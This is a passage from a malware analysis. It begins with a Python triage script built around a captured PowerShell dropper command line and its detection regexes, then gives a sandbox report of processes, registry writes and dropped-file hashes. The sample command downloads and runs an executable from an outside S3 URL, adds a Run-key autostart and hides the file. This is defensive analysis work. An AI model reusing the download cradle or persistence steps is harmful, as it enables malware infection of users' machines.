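    r"""Invoke-WebRequest -Uri $decoyURL -OutFile $decoyPath;Start-Process $decoyPath;Start-Sleep -s 7;"""
    r"""New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RUN" -Name $randomStr -Value $savePath -Force;;"""
    r"""$peDirectURL = 'https://s3-ap-southeast-1.amazonaws.com/bnmmj/awaobinna.exe';Invoke-WebRequest -Uri $peDirectURL -OutFile $savePath;"""
    r"""Start-Process $savePath;attrib +h +s $savePath;"""
)
SAMPLE_CMDLINE = SAMPLE_HOST + SAMPLE_SCRIPT

# Leading (possibly quoted) image path followed by any number of "-Flag [value]" host arguments;
# assumes the recorded form, i.e. the image path comes first.
HOST_PREFIX_RE = re.compile(r'^\s*(?:"[^"]*"|\S+)\s+(?:-\w+(?:\s+(?![$-])\S+)?\s+)*')
URL_RE = re.compile(r"""https?://[^\s'"<>)]+""")

# Behaviours to flag (matched case-insensitively). The labels are my own.
CHECKS = {
    "execution_policy_bypass": r"-ExecutionPolicy\s+bypass",
    "hidden_window": r"-WindowStyle\s+hidden",
    "download_cradle": r"Invoke-WebRequest|\.DownloadFile\(|\.DownloadString\(|Net\.WebClient",
    "run_key_persistence": r"New-ItemProperty\s[^;]*CurrentVersion\\Run",
    "drops_to_appdata": r"\$env:APPDATA",
    "starts_downloaded_file": r"Start-Process\s+\$",
    "hides_dropped_file": r"\battrib\s+\+h\s+\+s",
}


def strip_host_prefix(cmdline):
    """Return the script body: everything after the image path and the leading host flags."""
    m = HOST_PREFIX_RE.match(cmdline)
    return cmdline[m.end():] if m else cmdline


def split_statements(script):
    """Split on ';' outside single or double quotes; empty statements (from ';;') are dropped."""
    statements, buf, quote = [], [], None
    for ch in script:
        if quote:
            buf.append(ch)
            if ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
            buf.append(ch)
        elif ch == ";":
            stmt = "".join(buf).strip()
            if stmt:
                statements.append(stmt)
            buf = []
        else:
            buf.append(ch)
    tail = "".join(buf).strip()
    if tail:
        statements.append(tail)
    return statements


def triage(cmdline):
    """Return statements, per-check hits, extracted URLs and a coarse verdict for one command line."""
    findings = {name: bool(re.search(rx, cmdline, re.I)) for name, rx in CHECKS.items()}
    score = sum(findings.values())
    return {
        "statements": split_statements(strip_host_prefix(cmdline)),
        "findings": findings,
        "urls": sorted(set(URL_RE.findall(cmdline))),
        "score": score,
        # Threshold is an assumption: cradle + persistence + hiding is already well past it.
        "verdict": "malicious" if score >= 4 else "suspicious" if score >= 2 else "clean",
    }


if __name__ == "__main__":
    result = triage(SAMPLE_CMDLINE)
    for i, stmt in enumerate(result["statements"], 1):
        print(f"{i:2d}: {stmt}")
    print(result["findings"], result["urls"], result["verdict"])
```

The statement listing is what makes the flow readable: decoy download and Start-Process, a seven-second sleep, the HKCU Run value pointing at a path that does not exist yet, then the payload download, its launch and the attrib +h +s that hides it. Note that the Run value is written before the executable is fetched, so a defender looking at the registry alone sees an autorun entry for a file that may not be on disk if the second download failed.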

PID
2984
CMD
C:\Windows\system32\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
Path
C:\Windows\system32\DllHost.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
COM Surrogate
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\dllhost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\program files\windows photo viewer\photoviewer.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\version.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\d3d9.dll
c:\windows\system32\d3d8thk.dll
c:\windows\system32\slc.dll
c:\windows\system32\windowscodecs.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\oleacc.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\windows photo viewer\photobase.dll
c:\windows\system32\propsys.dll
c:\program files\internet explorer\ieproxy.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\profapi.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\actxprxy.dll
c:\program files\windows photo viewer\imagingengine.dll
c:\windows\system32\mscms.dll
c:\windows\system32\userenv.dll
c:\windows\system32\icm32.dll
c:\windows\system32\thumbcache.dll
c:\windows\system32\psapi.dll

PID
2632
CMD
"C:\Users\admin\AppData\Roaming\WfFyPbj.exe"
Path
C:\Users\admin\AppData\Roaming\WfFyPbj.exe
Indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\roaming\wffypbj.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\aclayers.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\mpr.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\riched32.dll
c:\windows\system32\riched20.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\clbcatq.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\users\admin\appdata\local\temp\88465914\lwh.exe
c:\windows\system32\sfc.dll
c:\windows\system32\sfc_os.dll
c:\windows\system32\devrtl.dll

PID
3132
CMD
"C:\Windows\system32\attrib.exe" +h +s C:\Users\admin\AppData\Roaming\WfFyPbj.exe
Path
C:\Windows\system32\attrib.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Attribute Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\attrib.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ulib.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
3768
CMD
"C:\Users\admin\AppData\Local\Temp\88465914\lwh.exe" fld=ktl
Path
C:\Users\admin\AppData\Local\Temp\88465914\lwh.exe
Indicators
No indicators
Parent process
WfFyPbj.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
AutoIt Team
Description
AutoIt v3 Script
Version
3, 3, 14, 5
Modules
Image
c:\users\admin\appdata\local\temp\88465914\lwh.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\wsock32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\version.dll
c:\windows\system32\winmm.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\mpr.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\psapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\aclayers.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\winspool.drv
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll

PID
2736
CMD
C:\Users\admin\AppData\Local\Temp\88465914\lwh.exe C:\Users\admin\AppData\Local\Temp\88465914\VTOCI
Path
C:\Users\admin\AppData\Local\Temp\88465914\lwh.exe
Indicators
Parent process
lwh.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
AutoIt Team
Description
AutoIt v3 Script
Version
3, 3, 14, 5
Modules
Image
c:\users\admin\appdata\local\temp\88465914\lwh.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\wsock32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\version.dll
c:\windows\system32\winmm.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\wininet.dll
c:\windows\system32\mpr.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\psapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\aclayers.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\winspool.drv
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\regsvcs.exe

PID
1144
CMD
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Path
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Indicators
Parent process
lwh.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft .NET Services Installation Utility
Version
4.6.1055.0 built by: NETFXREL2
Modules
Image
c:\windows\microsoft.net\framework\v4.0.30319\regsvcs.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\avicap32.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\winmm.dll
c:\windows\system32\version.dll
c:\windows\system32\msvfw32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msacm32.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\wsock32.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\aclayers.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\mpr.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winrnr.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\rasadhlp.dll

Registry activity

Total events
1767
Read events
1609
Write events
156
Delete events
2

Modification events

PID
Process
Operation
Key
Name
Value
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
CompatibilityFlags
0
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
SecuritySafe
1
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
––
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active
{D6448701-150F-11E9-AA93-5254004A04AF}
0
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Type
4
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Count
3
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Time
E307010004000A0013002A0013003000
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\iexplore
Type
4
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\iexplore
Count
3
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\iexplore
Time
E307010004000A0013002A0013003000
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
FullScreen
no
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
Window_Placement
2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF20000000200000004003000078020000
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites\Links
Order
08000000020000000C01000001000000020000007E0000000000000070003200EC000000464B245120005355474745537E312E55524C0000540008000400EFBE454B974D464B24512A000000F94300000000020000000000000000000000000000005300750067006700650073007400650064002000530069007400650073002E00750072006C0000001C00000000000000820000000100000074003200E2000000464B24512000574542534C497E312E55524C0000580008000400EFBE454B864A464B24512A000000743E0000000003000000000000000000000000000000570065006200200053006C006900630065002000470061006C006C006500720079002E00750072006C0000001C00000000000000
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\WindowsSearch
UpgradeTime
B51852991CA9D401
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\WindowsSearch
UpgradeTime
71D752991CA9D401
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0
Path
C:\Users\admin\Favorites\Links\Suggested Sites.url
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0
Handler
{B0FA7D7C-7195-4F03-B03E-9DC1C9EBC394}
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0
FeedUrl
https://ieonline.microsoft.com/#ieslice
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0
DisplayName
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0
ErrorState
0
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0
DisplayMask
0
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\1
Path
C:\Users\admin\Favorites\Links\Web Slice Gallery.url
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\1
Handler
{B0FA7D7C-7195-4F03-B03E-9DC1C9EBC394}
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\1
FeedUrl
http://go.microsoft.com/fwlink/?LinkId=121315
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\1
DisplayName
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\1
ErrorState
0
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\1
DisplayMask
0
3440
iexplore.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012018082720180903
3440
iexplore.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012018090920180910
3440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}\iexplore
Type
3
3440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}\iexplore
Count
3
3440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}\iexplore
Time
E307010004000A0013002A001300AD00
3440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Type
3
3440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Count
3
3440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Time
E307010004000A0013002A001300CD00
3440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore
Type
3
3440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore
Count
3
3440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore
Time
E307010004000A0013002A0013001B01
3440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3440
iexplore.exe
write
HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Microsoft Word
3440
iexplore.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Default MHTML Editor
Last
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "%1"
3440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012019011020190111
CachePath
%USERPROFILE%\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012019011020190111
3440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012019011020190111
CachePrefix
:2019011020190111:
3440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012019011020190111
CacheLimit
8192
3440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012019011020190111
CacheOptions
11
3440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012019011020190111
CacheRepair
0
3440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\iexplore
Type
1
3440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\iexplore
Flags
0
3440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\iexplore
Count
1
3440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\iexplore
Time
E307010004000A0013002A0026002500
3716
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
3716
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
0
3716
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
0
3716
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
4294901760
3716
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
4294901760
3716
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
1048576
3716
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
%windir%\tracing
3716
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
0
3716
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
0
3716
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
4294901760
3716
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
4294901760
3716
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
1048576
3716
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
%windir%\tracing
3716
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{FFE2A43C-56B9-4BF5-9A79-CC6D4285608A} {00000122-0000-0000-C000-000000000046} 0xFFFF
01000000000000007032D7AA1CA9D401
3716
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Direct3D\MostRecentApplication
Name
powershell.exe
3716
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
WfFyPbj
C:\Users\admin\AppData\Roaming\WfFyPbj.exe
3716
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3716
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2984
DllHost.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Direct3D\MostRecentApplication
Name
DllHost.exe
2984
DllHost.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows Photo Viewer\Viewer
MainWndPos
6000000034000000A00400008002000000000000
2632
WfFyPbj.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2632
WfFyPbj.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2736
lwh.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
qwertyhfdsd.exe
C:\Users\admin\AppData\Local\Temp\88465914\lwh.exe C:\Users\admin\AppData\Local\Temp\88465914\FLD_KT~1

Files activity

Executable files
2
Suspicious files
4
Text files
53
Unknown types
1

Dropped files

PID
Process
Filename
Type
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\lwh.exe
executable
MD5: c56b5f0201a3b3de53e561fe76912bfd
SHA256: 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
3716
powershell.exe
C:\Users\admin\AppData\Roaming\WfFyPbj.exe
executable
MD5: b34a49301f280a04d59ab288630855ee
SHA256: e59515a8baa2988627ba68c97928f77d11fd11f93527c7359c2d7897fd5fd464
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\vsx.xl
text
MD5: 3fe745b71e5034d2298f195b27951796
SHA256: d8fc9b9a9bd3b7a51311be20b11632053c7331369f3bb8cc3e475f990ae224aa
3000
iexplore.exe
C:\Users\admin\AppData\Local\Temp\~DF4BCC0002D6AE4369.TMP
––
MD5:  ––
SHA256:  ––
3000
iexplore.exe
